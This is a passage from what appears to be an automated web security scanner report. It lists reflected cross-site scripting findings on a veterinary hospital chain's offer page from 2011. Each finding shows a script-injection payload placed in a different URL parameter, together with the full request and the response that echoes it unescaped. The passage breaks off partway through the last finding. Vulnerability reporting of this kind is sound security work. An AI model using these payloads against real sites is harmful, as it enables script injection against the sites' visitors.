2.38. http://www.vcahospitals.com/main/offer [phone parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.vcahospitals.com
Path:   /main/offer

Issue detail

The value of the phone request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 141be"><script>alert(1)</script>908e5de26cc was submitted in the phone parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /main/offer?addr=&city=&date=1307084400&email=&fname=&formtype=CORP&guid=0488BA99-5545-4992-912E-EE3E92538798&ipaddress=173.193.214.243&lname=&newmex=0&optin=&other=&petage=&petname=&pettype=&phone=141be"><script>alert(1)</script>908e5de26cc&referer=&state=&submit=Get+FREE+Coupon&token=aa13a28e1773f137e31261bccc5c24bc&tollfree=866-825-8416&uri=http:%2f%2fwww.vcahospitals.com%2fmain%2foffer%3faddr%3d%26city%3d%26date%3d1307084400%26email%3d%26fname%3d%26formtype%3dCORP%26guid%3d95D5FB0B-779F-4D18-9C9E-501AD398C559%26ipaddress%3d173.193.214.243%26lname%3d%26newmex%3d0%26optin%3d%26other%3d%26petage%3d%26petname%3d%26pettype%3d%26phone%3d%26referer%3d%26state%3d%26submit%3dGet%2bFREE%2bCoupon%26token%3ddda68e64d460e98531171085a5a8ad78%26tollfree%3d866-825-8416%26uri%3dhttp%253a%252f%252fwww.vcahospitals.com%252fmain%252foffer%253faddr%253d%2526city%253d%2526date%253d1307084400%2526email%253d%2526fname%253d%2526formtype%253dCORP%2526guid%253dD4DE5467-1E6D-4C3E-80D6-E52DB1140F3A%2526ipaddress%253d173.193.214.243%2526lname%253d%2526newmex%253d0%2526optin%253d%2526other%253d%2526petage%253d%2526petname%253d%2526pettype%253d%2526phone%253d%2526referer%253d%2526state%253d%2526submit%253dGet%252bFREE%252bCoupon%2526token%253dc6268853c430a181c06a3eda75dae1a1%2526tollfree%253d866-825-8416%2526uri%253dhttp%25253a%25252f%25252fwww.vcahospitals.com%25252fmain%25252foffer%25253faddr%25253d%252526city%25253d%252526date%25253d1307084400%252526email%25253d%252526fname%25253d%252526formtype%25253dCORP%252526guid%25253d6770E3F2-2A04-4662-AEB3-FE70D3111F6D%252526ipaddress%25253d173.193.214.243%252526lname%25253d%252526newmex%25253d0%252526optin%25253d%252526other%25253d%252526petage%25253d%252526petname%25253d%252526pettype%25253d%252526phone%25253d%252526referer%25253d%252526state%25253d%252526submit%25253dGet%25252bFREE%25252bCoupon%252526token%25253dcdbd8b098f8070e3c19207ef06a5e6e1%252526tollfree%25253d866-825-8416%252526uri%25253dhttp%2525253a%2525252f%2525252fwww.vcahospitals.com%2525252fmain%2525252foffer%2525253faddr%2525253d%25252526city%2525253d%25252526date%2525253d1307084400%25252526email%2525253d%25252526fname%2525253d%25252526formtype%2525253dCORP%25252526guid%2525253dFBBB127E-9283-4C9A-8A61-A34D07FC7146%25252526ipaddress%2525253d173.193.214.243%25252526lname%2525253d%25252526newmex%2525253d0%25252526optin%2525253d%25252526other%2525253d%25252526petage%2525253d%25252526petname%2525253d%25252526pettype%2525253d%25252526phone%2525253d%25252526referer%2525253d%25252526state%2525253d%25252526submit%2525253dGet%2525252bFREE%2525252bCoupon%25252526token%2525253d81c834ba6ebffe11ddefbac1e3647bda%25252526tollfree%2525253d866-825-8416%25252526uri%2525253dhttp%252525253a%252525252f%252525252fwww.vcahospitals.com%252525252fmain%252525252foffer%25252526useragent%2525253dMozilla%252525252f4.0%2525252b(compatible%252525253b%2525252bMSIE%2525252b6.0%252525253b%2525252bWindows%2525252bNT%2525252b5.1%252525253b%2525252bSV1%252525253b%2525252b.NET%2525252bCLR%2525252b1.1.4322)%25252526variant%2525253d%25252526zip%2525253d%252526useragent%25253dMozilla%2525252f4.0%25252b(compatible%2525253b%25252bMSIE%25252b6.0%2525253b%25252bWindows%25252bNT%25252b5.1%2525253b%25252bSV1%2525253b%25252b.NET%25252bCLR%25252b1.1.4322)%252526variant%25253d%252526zip%25253d%2526useragent%253dMozilla%25252f4.0%252b(compatible%25253b%252bMSIE%252b6.0%25253b%252bWindows%252bNT%252b5.1%25253b%252bSV1%25253b%252b.NET%252bCLR%252b1.1.4322)%2526variant%253d%2526zip%253d%26useragent%3dMozilla%252f4.0%2b(compatible%253b%2bMSIE%2b6.0%253b%2bWindows%2bNT%2b5.1%253b%2bSV1%253b%2b.NET%2bCLR%2b1.1.4322)%26variant%3d%26zip%3d&useragent=Mozilla%2f4.0+(compatible%3b+MSIE+6.0%3b+Windows+NT+5.1%3b+SV1%3b+.NET+CLR+1.1.4322)&variant=&zip= HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.vcahospitals.com

Response

HTTP/1.1 200 OK
Date: Sat, 05 Mar 2011 12:17:56 GMT
Server: Apache/2.2.15 (Win32) PHP/5.2.14
X-Powered-By: PHP/5.2.14
Set-Cookie: PHPSESSID=cuk6kin33gemm42a0q0adqee65; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Content-Length: 21850

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content-
...[SNIP]...
thank-you.html?addr=&city=&date=1307084400&email=&fname=&formtype=CORP&guid=0488BA99-5545-4992-912E-EE3E92538798&ipaddress=173.193.214.243&lname=&newmex=0&optin=&other=&petage=&petname=&pettype=&phone=141be"><script>alert(1)</script>908e5de26cc&referer=&state=&submit=Get+FREE+Coupon&token=aa13a28e1773f137e31261bccc5c24bc&tollfree=866-825-8416&uri=http:%2f%2fwww.vcahospitals.com%2fmain%2foffer%3faddr%3d%26city%3d%26date%3d1307084400%26email%3
...[SNIP]...

2.39. http://www.vcahospitals.com/main/offer [r parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.vcahospitals.com
Path:   /main/offer

Issue detail

The value of the r request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fbd45"><script>alert(1)</script>a545781095a was submitted in the r parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /main/offer?r=E13fbd45"><script>alert(1)</script>a545781095a&utm_source=google&utm_medium=ppc&utm_term=vca%20antech&utm_campaign=e13geotarget_e13branded&gclid=CNrfoemwt6cCFcbd4Aod8keVAw HTTP/1.1
Host: www.vcahospitals.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sat, 05 Mar 2011 12:03:51 GMT
Server: Apache/2.2.15 (Win32) PHP/5.2.14
X-Powered-By: PHP/5.2.14
Set-Cookie: PHPSESSID=vjr1h35soi9lhsqsn64d78ocd1; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Content-Length: 10834

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content-
...[SNIP]...
<form action="http://www.vcahospitals.com/main/offer/thank-you.html?r=E13fbd45"><script>alert(1)</script>a545781095a&utm_source=google&utm_medium=ppc&utm_term=vca%20antech&utm_campaign=e13geotarget_e13branded&gclid=CNrfoemwt6cCFcbd4Aod8keVAw" method="POST" name="offer-form" id="offer-form" class="input-form">
...[SNIP]...

2.40. http://www.vcahospitals.com/main/offer [referer parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.vcahospitals.com
Path:   /main/offer

Issue detail

The value of the referer request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload df6e8"><script>alert(1)</script>093b3b8f1c4 was submitted in the referer parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /main/offer?addr=&city=&date=1307084400&email=&fname=&formtype=CORP&guid=0488BA99-5545-4992-912E-EE3E92538798&ipaddress=173.193.214.243&lname=&newmex=0&optin=&other=&petage=&petname=&pettype=&phone=&referer=df6e8"><script>alert(1)</script>093b3b8f1c4&state=&submit=Get+FREE+Coupon&token=aa13a28e1773f137e31261bccc5c24bc&tollfree=866-825-8416&uri=http:%2f%2fwww.vcahospitals.com%2fmain%2foffer%3faddr%3d%26city%3d%26date%3d1307084400%26email%3d%26fname%3d%26formtype%3dCORP%26guid%3d95D5FB0B-779F-4D18-9C9E-501AD398C559%26ipaddress%3d173.193.214.243%26lname%3d%26newmex%3d0%26optin%3d%26other%3d%26petage%3d%26petname%3d%26pettype%3d%26phone%3d%26referer%3d%26state%3d%26submit%3dGet%2bFREE%2bCoupon%26token%3ddda68e64d460e98531171085a5a8ad78%26tollfree%3d866-825-8416%26uri%3dhttp%253a%252f%252fwww.vcahospitals.com%252fmain%252foffer%253faddr%253d%2526city%253d%2526date%253d1307084400%2526email%253d%2526fname%253d%2526formtype%253dCORP%2526guid%253dD4DE5467-1E6D-4C3E-80D6-E52DB1140F3A%2526ipaddress%253d173.193.214.243%2526lname%253d%2526newmex%253d0%2526optin%253d%2526other%253d%2526petage%253d%2526petname%253d%2526pettype%253d%2526phone%253d%2526referer%253d%2526state%253d%2526submit%253dGet%252bFREE%252bCoupon%2526token%253dc6268853c430a181c06a3eda75dae1a1%2526tollfree%253d866-825-8416%2526uri%253dhttp%25253a%25252f%25252fwww.vcahospitals.com%25252fmain%25252foffer%25253faddr%25253d%252526city%25253d%252526date%25253d1307084400%252526email%25253d%252526fname%25253d%252526formtype%25253dCORP%252526guid%25253d6770E3F2-2A04-4662-AEB3-FE70D3111F6D%252526ipaddress%25253d173.193.214.243%252526lname%25253d%252526newmex%25253d0%252526optin%25253d%252526other%25253d%252526petage%25253d%252526petname%25253d%252526pettype%25253d%252526phone%25253d%252526referer%25253d%252526state%25253d%252526submit%25253dGet%25252bFREE%25252bCoupon%252526token%25253dcdbd8b098f8070e3c19207ef06a5e6e1%252526tollfree%25253d866-825-8416%252526uri%25253dhttp%2525253a%2525252f%2525252fwww.vcahospitals.com%2525252fmain%2525252foffer%2525253faddr%2525253d%25252526city%2525253d%25252526date%2525253d1307084400%25252526email%2525253d%25252526fname%2525253d%25252526formtype%2525253dCORP%25252526guid%2525253dFBBB127E-9283-4C9A-8A61-A34D07FC7146%25252526ipaddress%2525253d173.193.214.243%25252526lname%2525253d%25252526newmex%2525253d0%25252526optin%2525253d%25252526other%2525253d%25252526petage%2525253d%25252526petname%2525253d%25252526pettype%2525253d%25252526phone%2525253d%25252526referer%2525253d%25252526state%2525253d%25252526submit%2525253dGet%2525252bFREE%2525252bCoupon%25252526token%2525253d81c834ba6ebffe11ddefbac1e3647bda%25252526tollfree%2525253d866-825-8416%25252526uri%2525253dhttp%252525253a%252525252f%252525252fwww.vcahospitals.com%252525252fmain%252525252foffer%25252526useragent%2525253dMozilla%252525252f4.0%2525252b(compatible%252525253b%2525252bMSIE%2525252b6.0%252525253b%2525252bWindows%2525252bNT%2525252b5.1%252525253b%2525252bSV1%252525253b%2525252b.NET%2525252bCLR%2525252b1.1.4322)%25252526variant%2525253d%25252526zip%2525253d%252526useragent%25253dMozilla%2525252f4.0%25252b(compatible%2525253b%25252bMSIE%25252b6.0%2525253b%25252bWindows%25252bNT%25252b5.1%2525253b%25252bSV1%2525253b%25252b.NET%25252bCLR%25252b1.1.4322)%252526variant%25253d%252526zip%25253d%2526useragent%253dMozilla%25252f4.0%252b(compatible%25253b%252bMSIE%252b6.0%25253b%252bWindows%252bNT%252b5.1%25253b%252bSV1%25253b%252b.NET%252bCLR%252b1.1.4322)%2526variant%253d%2526zip%253d%26useragent%3dMozilla%252f4.0%2b(compatible%253b%2bMSIE%2b6.0%253b%2bWindows%2bNT%2b5.1%253b%2bSV1%253b%2b.NET%2bCLR%2b1.1.4322)%26variant%3d%26zip%3d&useragent=Mozilla%2f4.0+(compatible%3b+MSIE+6.0%3b+Windows+NT+5.1%3b+SV1%3b+.NET+CLR+1.1.4322)&variant=&zip= HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.vcahospitals.com

Response

HTTP/1.1 200 OK
Date: Sat, 05 Mar 2011 12:18:01 GMT
Server: Apache/2.2.15 (Win32) PHP/5.2.14
X-Powered-By: PHP/5.2.14
Set-Cookie: PHPSESSID=g8pte6n4esqiq4spacl1mgj7g0; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Content-Length: 21807

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content-
...[SNIP]...
.html?addr=&city=&date=1307084400&email=&fname=&formtype=CORP&guid=0488BA99-5545-4992-912E-EE3E92538798&ipaddress=173.193.214.243&lname=&newmex=0&optin=&other=&petage=&petname=&pettype=&phone=&referer=df6e8"><script>alert(1)</script>093b3b8f1c4&state=&submit=Get+FREE+Coupon&token=aa13a28e1773f137e31261bccc5c24bc&tollfree=866-825-8416&uri=http:%2f%2fwww.vcahospitals.com%2fmain%2foffer%3faddr%3d%26city%3d%26date%3d1307084400%26email%3d%26fname
...[SNIP]...

2.41. http://www.vcahospitals.com/main/offer [state parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.vcahospitals.com
Path:   /main/offer

Issue detail

The value of the state request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2a4e4"><script>alert(1)</script>eea3abc545b was submitted in the state parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /main/offer?=3&state=FL2a4e4"><script>alert(1)</script>eea3abc545b&guid=2505B0C6-B6AA-4144-878F-54873D353284 HTTP/1.1
Referer: http://www.vcahospitals.com/main/offer/thank-you.html?
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.vcahospitals.com
Cookie: PHPSESSID=1af1jedp03fokmt067uielfdf6
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Sat, 05 Mar 2011 12:17:57 GMT
Server: Apache/2.2.15 (Win32) PHP/5.2.14
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Content-Length: 14501

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content-
...[SNIP]...
<form action="http://www.vcahospitals.com/main/offer/thank-you.html?=3&state=FL2a4e4"><script>alert(1)</script>eea3abc545b&guid=2505B0C6-B6AA-4144-878F-54873D353284" method="POST" name="offer-form" id="offer-form" class="input-form">
...[SNIP]...

2.42. http://www.vcahospitals.com/main/offer [submit parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.vcahospitals.com
Path:   /main/offer

Issue detail

The value of the submit request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 82bfe"><script>alert(1)</script>eac88d58519 was submitted in the submit parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /main/offer?addr=&city=&date=1307084400&email=&fname=&formtype=CORP&guid=0488BA99-5545-4992-912E-EE3E92538798&ipaddress=173.193.214.243&lname=&newmex=0&optin=&other=&petage=&petname=&pettype=&phone=&referer=&state=&submit=Get+FREE+Coupon82bfe"><script>alert(1)</script>eac88d58519&token=aa13a28e1773f137e31261bccc5c24bc&tollfree=866-825-8416&uri=http:%2f%2fwww.vcahospitals.com%2fmain%2foffer%3faddr%3d%26city%3d%26date%3d1307084400%26email%3d%26fname%3d%26formtype%3dCORP%26guid%3d95D5FB0B-779F-4D18-9C9E-501AD398C559%26ipaddress%3d173.193.214.243%26lname%3d%26newmex%3d0%26optin%3d%26other%3d%26petage%3d%26petname%3d%26pettype%3d%26phone%3d%26referer%3d%26state%3d%26submit%3dGet%2bFREE%2bCoupon%26token%3ddda68e64d460e98531171085a5a8ad78%26tollfree%3d866-825-8416%26uri%3dhttp%253a%252f%252fwww.vcahospitals.com%252fmain%252foffer%253faddr%253d%2526city%253d%2526date%253d1307084400%2526email%253d%2526fname%253d%2526formtype%253dCORP%2526guid%253dD4DE5467-1E6D-4C3E-80D6-E52DB1140F3A%2526ipaddress%253d173.193.214.243%2526lname%253d%2526newmex%253d0%2526optin%253d%2526other%253d%2526petage%253d%2526petname%253d%2526pettype%253d%2526phone%253d%2526referer%253d%2526state%253d%2526submit%253dGet%252bFREE%252bCoupon%2526token%253dc6268853c430a181c06a3eda75dae1a1%2526tollfree%253d866-825-8416%2526uri%253dhttp%25253a%25252f%25252fwww.vcahospitals.com%25252fmain%25252foffer%25253faddr%25253d%252526city%25253d%252526date%25253d1307084400%252526email%25253d%252526fname%25253d%252526formtype%25253dCORP%252526guid%25253d6770E3F2-2A04-4662-AEB3-FE70D3111F6D%252526ipaddress%25253d173.193.214.243%252526lname%25253d%252526newmex%25253d0%252526optin%25253d%252526other%25253d%252526petage%25253d%252526petname%25253d%252526pettype%25253d%252526phone%25253d%252526referer%25253d%252526state%25253d%252526submit%25253dGet%25252bFREE%25252bCoupon%252526token%25253dcdbd8b098f8070e3c19207ef06a5e6e1%252526tollfree%25253d866-825-8416%252526uri%25253dhttp%2525253a%2525252f%2525252fwww.vcahospitals.com%2525252fmain%2525252foffer%2525253faddr%2525253d%25252526city%2525253d%25252526date%2525253d1307084400%25252526email%2525253d%25252526fname%2525253d%25252526formtype%2525253dCORP%25252526guid%2525253dFBBB127E-9283-4C9A-8A61-A34D07FC7146%25252526ipaddress%2525253d173.193.214.243%25252526lname%2525253d%25252526newmex%2525253d0%25252526optin%2525253d%25252526other%2525253d%25252526petage%2525253d%25252526petname%2525253d%25252526pettype%2525253d%25252526phone%2525253d%25252526referer%2525253d%25252526state%2525253d%25252526submit%2525253dGet%2525252bFREE%2525252bCoupon%25252526token%2525253d81c834ba6ebffe11ddefbac1e3647bda%25252526tollfree%2525253d866-825-8416%25252526uri%2525253dhttp%252525253a%252525252f%252525252fwww.vcahospitals.com%252525252fmain%252525252foffer%25252526useragent%2525253dMozilla%252525252f4.0%2525252b(compatible%252525253b%2525252bMSIE%2525252b6.0%252525253b%2525252bWindows%2525252bNT%2525252b5.1%252525253b%2525252bSV1%252525253b%2525252b.NET%2525252bCLR%2525252b1.1.4322)%25252526variant%2525253d%25252526zip%2525253d%252526useragent%25253dMozilla%2525252f4.0%25252b(compatible%2525253b%25252bMSIE%25252b6.0%2525253b%25252bWindows%25252bNT%25252b5.1%2525253b%25252bSV1%2525253b%25252b.NET%25252bCLR%25252b1.1.4322)%252526variant%25253d%252526zip%25253d%2526useragent%253dMozilla%25252f4.0%252b(compatible%25253b%252bMSIE%252b6.0%25253b%252bWindows%252bNT%252b5.1%25253b%252bSV1%25253b%252b.NET%252bCLR%252b1.1.4322)%2526variant%253d%2526zip%253d%26useragent%3dMozilla%252f4.0%2b(compatible%253b%2bMSIE%2b6.0%253b%2bWindows%2bNT%2b5.1%253b%2bSV1%253b%2b.NET%2bCLR%2b1.1.4322)%26variant%3d%26zip%3d&useragent=Mozilla%2f4.0+(compatible%3b+MSIE+6.0%3b+Windows+NT+5.1%3b+SV1%3b+.NET+CLR+1.1.4322)&variant=&zip= HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.vcahospitals.com

Response

HTTP/1.1 200 OK
Date: Sat, 05 Mar 2011 12:18:12 GMT
Server: Apache/2.2.15 (Win32) PHP/5.2.14
X-Powered-By: PHP/5.2.14
Set-Cookie: PHPSESSID=hhabg9v3lhlbkflav80vstra25; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Content-Length: 21807

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content-
...[SNIP]...
400&email=&fname=&formtype=CORP&guid=0488BA99-5545-4992-912E-EE3E92538798&ipaddress=173.193.214.243&lname=&newmex=0&optin=&other=&petage=&petname=&pettype=&phone=&referer=&state=&submit=Get+FREE+Coupon82bfe"><script>alert(1)</script>eac88d58519&token=aa13a28e1773f137e31261bccc5c24bc&tollfree=866-825-8416&uri=http:%2f%2fwww.vcahospitals.com%2fmain%2foffer%3faddr%3d%26city%3d%26date%3d1307084400%26email%3d%26fname%3d%26formtype%3dCORP%26guid%3
...[SNIP]...

2.43. http://www.vcahospitals.com/main/offer [token parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.vcahospitals.com
Path:   /main/offer

Issue detail

The value of the token request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7de71"><script>alert(1)</script>cc1ba56418e was submitted in the token parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /main/offer?addr=&city=&date=1307084400&email=&fname=&formtype=CORP&guid=0488BA99-5545-4992-912E-EE3E92538798&ipaddress=173.193.214.243&lname=&newmex=0&optin=&other=&petage=&petname=&pettype=&phone=&referer=&state=&submit=Get+FREE+Coupon&token=aa13a28e1773f137e31261bccc5c24bc7de71"><script>alert(1)</script>cc1ba56418e&tollfree=866-825-8416&uri=http:%2f%2fwww.vcahospitals.com%2fmain%2foffer%3faddr%3d%26city%3d%26date%3d1307084400%26email%3d%26fname%3d%26formtype%3dCORP%26guid%3d95D5FB0B-779F-4D18-9C9E-501AD398C559%26ipaddress%3d173.193.214.243%26lname%3d%26newmex%3d0%26optin%3d%26other%3d%26petage%3d%26petname%3d%26pettype%3d%26phone%3d%26referer%3d%26state%3d%26submit%3dGet%2bFREE%2bCoupon%26token%3ddda68e64d460e98531171085a5a8ad78%26tollfree%3d866-825-8416%26uri%3dhttp%253a%252f%252fwww.vcahospitals.com%252fmain%252foffer%253faddr%253d%2526city%253d%2526date%253d1307084400%2526email%253d%2526fname%253d%2526formtype%253dCORP%2526guid%253dD4DE5467-1E6D-4C3E-80D6-E52DB1140F3A%2526ipaddress%253d173.193.214.243%2526lname%253d%2526newmex%253d0%2526optin%253d%2526other%253d%2526petage%253d%2526petname%253d%2526pettype%253d%2526phone%253d%2526referer%253d%2526state%253d%2526submit%253dGet%252bFREE%252bCoupon%2526token%253dc6268853c430a181c06a3eda75dae1a1%2526tollfree%253d866-825-8416%2526uri%253dhttp%25253a%25252f%25252fwww.vcahospitals.com%25252fmain%25252foffer%25253faddr%25253d%252526city%25253d%252526date%25253d1307084400%252526email%25253d%252526fname%25253d%252526formtype%25253dCORP%252526guid%25253d6770E3F2-2A04-4662-AEB3-FE70D3111F6D%252526ipaddress%25253d173.193.214.243%252526lname%25253d%252526newmex%25253d0%252526optin%25253d%252526other%25253d%252526petage%25253d%252526petname%25253d%252526pettype%25253d%252526phone%25253d%252526referer%25253d%252526state%25253d%252526submit%25253dGet%25252bFREE%25252bCoupon%252526token%25253dcdbd8b098f8070e3c19207ef06a5e6e1%252526tollfree%25253d866-825-8416%252526uri%25253dhttp%2525253a%2525252f%2525252fwww.vcahospitals.com%2525252fmain%2525252foffer%2525253faddr%2525253d%25252526city%2525253d%25252526date%2525253d1307084400%25252526email%2525253d%25252526fname%2525253d%25252526formtype%2525253dCORP%25252526guid%2525253dFBBB127E-9283-4C9A-8A61-A34D07FC7146%25252526ipaddress%2525253d173.193.214.243%25252526lname%2525253d%25252526newmex%2525253d0%25252526optin%2525253d%25252526other%2525253d%25252526petage%2525253d%25252526petname%2525253d%25252526pettype%2525253d%25252526phone%2525253d%25252526referer%2525253d%25252526state%2525253d%25252526submit%2525253dGet%2525252bFREE%2525252bCoupon%25252526token%2525253d81c834ba6ebffe11ddefbac1e3647bda%25252526tollfree%2525253d866-825-8416%25252526uri%2525253dhttp%252525253a%252525252f%252525252fwww.vcahospitals.com%252525252fmain%252525252foffer%25252526useragent%2525253dMozilla%252525252f4.0%2525252b(compatible%252525253b%2525252bMSIE%2525252b6.0%252525253b%2525252bWindows%2525252bNT%2525252b5.1%252525253b%2525252bSV1%252525253b%2525252b.NET%2525252bCLR%2525252b1.1.4322)%25252526variant%2525253d%25252526zip%2525253d%252526useragent%25253dMozilla%2525252f4.0%25252b(compatible%2525253b%25252bMSIE%25252b6.0%2525253b%25252bWindows%25252bNT%25252b5.1%2525253b%25252bSV1%2525253b%25252b.NET%25252bCLR%25252b1.1.4322)%252526variant%25253d%252526zip%25253d%2526useragent%253dMozilla%25252f4.0%252b(compatible%25253b%252bMSIE%252b6.0%25253b%252bWindows%252bNT%252b5.1%25253b%252bSV1%25253b%252b.NET%252bCLR%252b1.1.4322)%2526variant%253d%2526zip%253d%26useragent%3dMozilla%252f4.0%2b(compatible%253b%2bMSIE%2b6.0%253b%2bWindows%2bNT%2b5.1%253b%2bSV1%253b%2b.NET%2bCLR%2b1.1.4322)%26variant%3d%26zip%3d&useragent=Mozilla%2f4.0+(compatible%3b+MSIE+6.0%3b+Windows+NT+5.1%3b+SV1%3b+.NET+CLR+1.1.4322)&variant=&zip= HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.vcahospitals.com

Response

HTTP/1.1 200 OK
Date: Sat, 05 Mar 2011 12:18:17 GMT
Server: Apache/2.2.15 (Win32) PHP/5.2.14
X-Powered-By: PHP/5.2.14
Set-Cookie: PHPSESSID=eq5ak2i8c2d6bskvfdik8qphb5; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Content-Length: 21807

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content-
...[SNIP]...
88BA99-5545-4992-912E-EE3E92538798&ipaddress=173.193.214.243&lname=&newmex=0&optin=&other=&petage=&petname=&pettype=&phone=&referer=&state=&submit=Get+FREE+Coupon&token=aa13a28e1773f137e31261bccc5c24bc7de71"><script>alert(1)</script>cc1ba56418e&tollfree=866-825-8416&uri=http:%2f%2fwww.vcahospitals.com%2fmain%2foffer%3faddr%3d%26city%3d%26date%3d1307084400%26email%3d%26fname%3d%26formtype%3dCORP%26guid%3d95D5FB0B-779F-4D18-9C9E-501AD398C559%2
...[SNIP]...

2.44. http://www.vcahospitals.com/main/offer [tollfree parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.vcahospitals.com
Path:   /main/offer

Issue detail

The value of the tollfree request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 61e9e"><script>alert(1)</script>8361d0a233a was submitted in the tollfree parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

